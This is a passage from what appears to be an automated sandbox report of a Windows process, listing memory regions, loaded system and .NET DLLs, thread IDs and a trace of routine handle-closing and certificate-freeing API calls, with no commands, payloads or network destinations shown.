0x7ffbe9ab8d20 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 728 start_va = 0x7ffbdd030000 end_va = 0x7ffbdd04dfff monitored = 0 entry_point = 0x7ffbdd03ef80 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 729 start_va = 0x1e3518a0000 end_va = 0x1e351a61fff monitored = 1 entry_point = 0x1e351a59d32 region_type = mapped_file name = "system.web.extensions.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\System.Web.Extensions\\v4.0_4.0.0.0__31bf3856ad364e35\\System.Web.Extensions.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.web.extensions\\v4.0_4.0.0.0__31bf3856ad364e35\\system.web.extensions.dll") Region: id = 730 start_va = 0x7ffb70a50000 end_va = 0x7ffb70a5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb70a50000" filename = "" Region: id = 731 start_va = 0x7ffb70a60000 end_va = 0x7ffb70a6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb70a60000" filename = "" Region: id = 732 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 733 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 734 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 735 start_va = 0x1e3516e0000 end_va = 0x1e3516effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516e0000" filename = "" Region: id = 736 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 737 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 738 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 739 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 740 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 741 start_va = 0x1e3516e0000 end_va = 0x1e3516effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516e0000" filename = "" Region: id = 742 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 743 start_va = 0x1e3516e0000 end_va = 0x1e3516effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516e0000" filename = "" Region: id = 744 start_va = 0x1e3516f0000 end_va = 0x1e3516fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516f0000" filename = "" Region: id = 745 start_va = 0x1e351700000 end_va = 0x1e35170ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e351700000" filename = "" Region: id = 746 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 747 start_va = 0x1e3516e0000 end_va = 0x1e3516effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516e0000" filename = "" Region: id = 748 start_va = 0x1e3516f0000 end_va = 0x1e3516fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516f0000" filename = "" Region: id = 749 start_va = 0x1e351700000 end_va = 0x1e35170ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e351700000" filename = "" Region: id = 750 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 751 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 752 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 753 start_va = 0x7ffbc7bb0000 end_va = 0x7ffbc8b69fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.web.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Web\\e0f1aa5ae849a43ee123d95e457efc03\\System.Web.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.web\\e0f1aa5ae849a43ee123d95e457efc03\\system.web.ni.dll") Region: id = 754 start_va = 0x7ffbc79c0000 end_va = 0x7ffbc7baafff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.drawing.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Drawing\\43de4a177616225e9b6262468e1c3b53\\System.Drawing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.drawing\\43de4a177616225e9b6262468e1c3b53\\system.drawing.ni.dll") Region: id = 755 start_va = 0x7ffb70a70000 end_va = 0x7ffb70a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb70a70000" filename = "" Region: id = 756 start_va = 0x7ffb70a80000 end_va = 0x7ffb70a8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb70a80000" filename = "" Region: id = 757 start_va = 0x7ffb70a90000 end_va = 0x7ffb70a9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb70a90000" filename = "" Region: id = 758 start_va = 0x7ffb70aa0000 end_va = 0x7ffb70aaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb70aa0000" filename = "" Region: id = 759 start_va = 0xb1573d0000 end_va = 0xb15740ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000b1573d0000" filename = "" Region: id = 760 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 761 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 762 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 763 start_va = 0x1e3516e0000 end_va = 0x1e3516effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516e0000" filename = "" Region: id = 764 start_va = 0x1e3516f0000 end_va = 0x1e3516fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516f0000" filename = "" Region: id = 765 start_va = 0x1e351700000 end_va = 0x1e35170ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e351700000" filename = "" Region: id = 766 start_va = 0x1e351710000 end_va = 0x1e35171ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e351710000" filename = "" Region: id = 767 start_va = 0x1e351720000 end_va = 0x1e35172ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e351720000" filename = "" Region: id = 768 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 769 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 770 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 771 start_va = 0x1e3516e0000 end_va = 0x1e3516effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516e0000" filename = "" Region: id = 772 start_va = 0x1e3516f0000 end_va = 0x1e3516fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516f0000" filename = "" Region: id = 773 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 774 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 775 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 776 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 777 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 778 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 779 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 780 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 781 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 782 start_va = 0x1e3516e0000 end_va = 0x1e3516effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516e0000" filename = "" Region: id = 783 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 784 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 785 start_va = 0x1e3516e0000 end_va = 0x1e3516effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516e0000" filename = "" Region: id = 786 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 787 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 788 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 789 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 790 start_va = 0x1e3516e0000 end_va = 0x1e3516effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516e0000" filename = "" Region: id = 791 start_va = 0x1e3516f0000 end_va = 0x1e3516fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516f0000" filename = "" Region: id = 792 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 793 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 794 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 795 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 796 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 797 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 798 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 799 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 800 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 801 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 802 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 803 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 804 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 805 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 806 start_va = 0x1e3516e0000 end_va = 0x1e3516effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516e0000" filename = "" Region: id = 807 start_va = 0x1e3516f0000 end_va = 0x1e3516fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516f0000" filename = "" Region: id = 808 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 809 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 810 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 811 start_va = 0x1e3516e0000 end_va = 0x1e3516effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516e0000" filename = "" Region: id = 812 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 813 start_va = 0x1e3516c0000 end_va = 0x1e3516cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516c0000" filename = "" Region: id = 814 start_va = 0x1e3516c0000 end_va = 0x1e3516cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516c0000" filename = "" Region: id = 815 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 816 start_va = 0x1e3516c0000 end_va = 0x1e3516cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516c0000" filename = "" Region: id = 817 start_va = 0x1e3516c0000 end_va = 0x1e3516cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516c0000" filename = "" Region: id = 818 start_va = 0x7ffb70ab0000 end_va = 0x7ffb70abffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb70ab0000" filename = "" Region: id = 819 start_va = 0x1e3516c0000 end_va = 0x1e3516cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516c0000" filename = "" Region: id = 820 start_va = 0x1e3516c0000 end_va = 0x1e3516cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516c0000" filename = "" Region: id = 821 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 822 start_va = 0x1e3516c0000 end_va = 0x1e3516cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516c0000" filename = "" Region: id = 823 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 824 start_va = 0x1e3516c0000 end_va = 0x1e3516cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516c0000" filename = "" Region: id = 825 start_va = 0x1e3516c0000 end_va = 0x1e3516cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516c0000" filename = "" Region: id = 826 start_va = 0x1e3516c0000 end_va = 0x1e3516cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516c0000" filename = "" Region: id = 827 start_va = 0x1e3516c0000 end_va = 0x1e3516cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516c0000" filename = "" Region: id = 828 start_va = 0xb157450000 end_va = 0xb15748ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000b157450000" filename = "" Region: id = 829 start_va = 0x1e3516c0000 end_va = 0x1e3516cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516c0000" filename = "" Region: id = 830 start_va = 0x1e3516c0000 end_va = 0x1e3516cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516c0000" filename = "" Region: id = 831 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 832 start_va = 0x1e3516e0000 end_va = 0x1e3516effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516e0000" filename = "" Region: id = 833 start_va = 0x1e3516f0000 end_va = 0x1e3516fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516f0000" filename = "" Region: id = 834 start_va = 0x1e351700000 end_va = 0x1e35170ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e351700000" filename = "" Region: id = 835 start_va = 0x1e351710000 end_va = 0x1e35171ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e351710000" filename = "" Region: id = 836 start_va = 0x1e351720000 end_va = 0x1e35172ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e351720000" filename = "" Region: id = 837 start_va = 0x1e351730000 end_va = 0x1e35173ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e351730000" filename = "" Region: id = 838 start_va = 0x1e351740000 end_va = 0x1e35174ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e351740000" filename = "" Region: id = 839 start_va = 0x1e351750000 end_va = 0x1e35175ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e351750000" filename = "" Region: id = 840 start_va = 0x1e3516c0000 end_va = 0x1e3516cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516c0000" filename = "" Region: id = 841 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 842 start_va = 0x1e3516c0000 end_va = 0x1e3516cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516c0000" filename = "" Region: id = 843 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 844 start_va = 0x1e3516e0000 end_va = 0x1e3516effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516e0000" filename = "" Region: id = 845 start_va = 0x1e3516c0000 end_va = 0x1e3516cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516c0000" filename = "" Region: id = 846 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 847 start_va = 0x1e3516e0000 end_va = 0x1e3516effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516e0000" filename = "" Region: id = 848 start_va = 0x1e3516c0000 end_va = 0x1e3516cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516c0000" filename = "" Region: id = 849 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 850 start_va = 0x1e3516c0000 end_va = 0x1e3516cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516c0000" filename = "" Region: id = 851 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 852 start_va = 0x1e3516e0000 end_va = 0x1e3516effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516e0000" filename = "" Region: id = 853 start_va = 0x1e3516c0000 end_va = 0x1e3516cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516c0000" filename = "" Region: id = 854 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 855 start_va = 0x1e3516e0000 end_va = 0x1e3516effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516e0000" filename = "" Region: id = 856 start_va = 0x1e3516c0000 end_va = 0x1e3516cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516c0000" filename = "" Region: id = 857 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 858 start_va = 0x1e3516e0000 end_va = 0x1e3516effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516e0000" filename = "" Region: id = 859 start_va = 0x1e3516c0000 end_va = 0x1e3516cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516c0000" filename = "" Region: id = 860 start_va = 0x1e3516d0000 end_va = 0x1e3516dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516d0000" filename = "" Region: id = 861 start_va = 0xb157490000 end_va = 0xb1574cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000b157490000" filename = "" Region: id = 862 start_va = 0x7ffbc7800000 end_va = 0x7ffbc79bffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.commands.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\76b4de5afa2a20eef86641e48b8a2a9c\\Microsoft.PowerShell.Commands.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\microsoft.pae3498d9#\\76b4de5afa2a20eef86641e48b8a2a9c\\microsoft.powershell.commands.management.ni.dll") Region: id = 863 start_va = 0x1e3516c0000 end_va = 0x1e3516cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516c0000" filename = "" Region: id = 864 start_va = 0x1e3516c0000 end_va = 0x1e3516cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516c0000" filename = "" Region: id = 865 start_va = 0x1e3516c0000 end_va = 0x1e3516cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516c0000" filename = "" Region: id = 866 start_va = 0x1e351a70000 end_va = 0x1e351e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e351a70000" filename = "" Region: id = 867 start_va = 0x1e3516c0000 end_va = 0x1e3516cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516c0000" filename = "" Region: id = 868 start_va = 0x1e3516c0000 end_va = 0x1e3516cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516c0000" filename = "" Region: id = 869 start_va = 0x1e3516c0000 end_va = 0x1e3516cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516c0000" filename = "" Region: id = 870 start_va = 0x1e3516c0000 end_va = 0x1e3516cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3516c0000" filename = "" Region: id = 871 start_va = 0x1e3516c0000 end_va = 0x1e3516c3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 872 start_va = 0x7ffbe05f0000 end_va = 0x7ffbe07a7fff monitored = 0 entry_point = 0x7ffbe065e630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 873 start_va = 0x7ffbe3f30000 end_va = 0x7ffbe42b1fff monitored = 0 entry_point = 0x7ffbe3f81220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 874 start_va = 0x1e3516d0000 end_va = 0x1e3516d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001e3516d0000" filename = "" Region: id = 887 start_va = 0xb1574d0000 end_va = 0xb15750ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000b1574d0000" filename = "" Region: id = 1686 start_va = 0xb158750000 end_va = 0xb15878ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000b158750000" filename = "" Thread: id = 1 os_tid = 0x12a8 Thread: id = 8 os_tid = 0x1294 Thread: id = 9 os_tid = 0x1288 Thread: id = 10 os_tid = 0x1280 Thread: id = 11 os_tid = 0x1278 Thread: id = 12 os_tid = 0x798 [0140.395] CoGetContextToken (in: pToken=0xb1563ff3c0 | out: pToken=0xb1563ff3c0) returned 0x0 [0140.395] CoGetContextToken (in: pToken=0xb1563ff2c0 | out: pToken=0xb1563ff2c0) returned 0x0 [0140.395] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::Release () returned 0x1 [0140.395] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::Release () returned 0x0 [0140.396] RegCloseKey (hKey=0x638) returned 0x0 [0145.056] CloseHandle (hObject=0x6f8) returned 1 [0145.057] CloseHandle (hObject=0x728) returned 1 [0145.057] CloseHandle (hObject=0x714) returned 1 [0145.057] CloseHandle (hObject=0x6fc) returned 1 [0145.058] CloseHandle (hObject=0x710) returned 1 [0145.058] CloseHandle (hObject=0x720) returned 1 [0145.059] CloseHandle (hObject=0x704) returned 1 [0145.059] CloseHandle (hObject=0x70c) returned 1 [0145.059] CloseHandle (hObject=0x72c) returned 1 [0145.059] CloseHandle (hObject=0x708) returned 1 [0145.059] CloseHandle (hObject=0x71c) returned 1 [0145.060] CloseHandle (hObject=0x718) returned 1 [0146.508] CertFreeCertificateContext (pCertContext=0x1e3513ed420) returned 1 [0146.508] CertFreeCertificateContext (pCertContext=0x1e3513ece20) returned 1 [0148.924] CertFreeCertificateContext (pCertContext=0x1e3513ec520) returned 1 [0148.925] CloseHandle (hObject=0x6fc) returned 1 [0155.084] CloseHandle (hObject=0x8f4) returned 1 [0155.084] CertFreeCertificateContext (pCertContext=0x1e3513ed420) returned 1 [0155.085] CloseHandle (hObject=0x9b0) returned 1 [0155.085] CloseHandle (hObject=0x638) returned 1 [0155.085] CloseHandle (hObject=0x9a8) returned 1 [0155.086] CloseHandle (hObject=0x73c) returned 1 [0155.087] CertCloseStore (hCertStore=0x1e35142b050, dwFlags=0x0) returned 1 [0155.088] CertFreeCertificateContext (pCertContext=0x1e3513ed420) returned 1 [0155.089] CloseHandle (hObject=0x87c) returned 1 [0155.089] CloseHandle (hObject=0x878) returned 1 [0155.089] CertFreeCertificateContext (pCertContext=0x1e3513ecb20) returned 1 [0155.089] CloseHandle (hObject=0x870) returned 1 [0155.090] CloseHandle (hObject=0x86c) returned 1 [0155.090] CertFreeCertificateContext (pCertContext=0x1e3513edc20) returned 1 [0155.090] CloseHandle (hObject=0x738) returned 1 [0155.091] CloseHandle (hObject=0x798) returned 1 [0155.091] CertFreeCertificateContext (pCertContext=0x1e3513ecc20) returned 1 [0155.091] CloseHandle (hObject=0x794) returned 1 [0155.091] CloseHandle (hObject=0x734) returned 1 [0155.092] CloseHandle (hObject=0x790) returned 1 [0155.092] CloseHandle (hObject=0x78c) returned 1 [0155.093] CloseHandle (hObject=0x788) returned 1 [0155.093] CloseHandle (hObject=0x780) returned 1 [0155.093] CloseHandle (hObject=0x784) returned 1 [0155.093] CloseHandle (hObject=0x730) returned 1 [0155.093] CertFreeCertificateContext (pCertContext=0x1e3513edea0) returned 1 [0155.094] CertFreeCertificateContext (pCertContext=0x1e3513ec520) returned 1 [0165.429] CertFreeCertificateContext (pCertContext=0x1e3513eef20) returned 1 [0165.431] CertCloseStore (hCertStore=0x1e35142ad10, dwFlags=0x0) returned 1 [0165.432] CertFreeCertificateContext (pCertContext=0x1e3513eef20) returned 1 [0165.433] CertFreeCertificateContext (pCertContext=0x1e3513eeda0) returned 1 [0165.433] CertFreeCertificateContext (pCertContext=0x1e3513ef0a0) returned 1 [0165.434] CertFreeCertificateContext (pCertContext=0x1e3513ef6a0) returned 1 [0168.535] CloseHandle (hObject=0x458) returned 1 [0169.380] CloseHandle (hObject=0x35c) returned 1 [0169.380] CloseHandle (hObject=0x738) returned 1 [0169.381] CloseHandle (hObject=0x798) returned 1 [0169.381] CloseHandle (hObject=0x458) returned 1 [0169.381] CloseHandle (hObject=0x45c) returned 1 [0169.381] CloseHandle (hObject=0x730) returned 1 [0170.941] CloseHandle (hObject=0x45c) returned 1 [0170.941] 